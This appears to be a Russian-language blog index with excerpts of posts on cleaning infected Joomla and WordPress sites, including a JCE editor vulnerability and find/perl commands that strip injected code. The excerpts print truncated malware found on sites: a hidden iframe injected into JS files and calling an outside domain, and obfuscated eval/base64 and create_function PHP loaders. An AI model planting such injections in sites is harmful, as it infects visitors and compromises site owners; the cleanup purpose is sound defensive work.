Уязвимость Joomla с редактором JCE

В плагине редакторе JCE версии ниже 2.0.11 была обнаружена уязвимость и имеет место быть большая череда взломов с последующим внедрением вредоносного кода в js-файлы.Тот случай, который был виден мной, состоял из следующего кода: document.write(‘<iframe width=»55″ height=»55″ style=»width:100px;height:100px;position:absolute;left:-100px;top:0;» src=»http://cpjutiv.wikaba.com/0ca0885.tet?11″></iframe>’); Можно попробовать выполнить следующую команду в корне директории сайта, однако она несколько грубоватая find ./ -type f … Читать далееУязвимость Joomla с редактором JCE

Удаление кода

Не боимся различных спец.символов. <?php eval(«\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\ x28’jVNtT9tADP4+af8hQxNtBW0 … WqZ03tXtv1XthvHnT853nP6Udw5O+8376F1Vr+Se/qlsnaHrF+/AQ==’\x29\x29\x29\x3B»); ?> Делаем резервную копию изменяемых файлов и запускаем команду find ./ -type f -name «*.php» -exec perl -pi -e ‘s/\<\?php\ eval.*\»\)\;\ \?\>//g»’ ‘{}’ \;

Удаление кода eval(base64_decode(«DQplcnJvcl9yZXBvcn….

Не буду публиковать тела вредоносного кода целиком, дабы поисковики не подумали чего плохого =) <?php           eval(base64_decode(«DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnN … sNCn0KfQp9DQp9DQp9»)); Не забываем делать резервную копию директории сайта перед выполнением нижеприведенной команды. find ./ -type f -name «*.php» -exec perl -pi -e ‘s/eval\(base64_decode\(\»DQplcn.*9DQp9\»\)\)\;//g»’ ‘{}’ \;

Вирусы на сайте #3

Продолжаем бесконечную историю. Сегодня день начался с того, что блог перестал открываться по причине того, что хостер убрал InnoDB из поддерживаемых движков сервера баз данных MySQL. Пришлось слить дамп, выполнить команду sed ‘s/InnoDB/MyISAM/g’ old.sql > new.sql и залить обратно =) Сегодня наткнулся на такую прелесть: <?php $md5 = «abe69649a7dbde93d328df6049b55aea»; $wp_salt = array(‘(‘,’t’,’v’,’d’,»i»,»o»,»;»,»b»,’4′,’n’,»a»,»z»,’)’,»c»,»f»,»6″,»r»,»g»,»l»,»e»,»$»,’_’,’s’); $wp_add_filter = create_function(‘$’.’v’,$wp_salt[19].$wp_salt[2].$ … Читать далееВирусы на сайте #3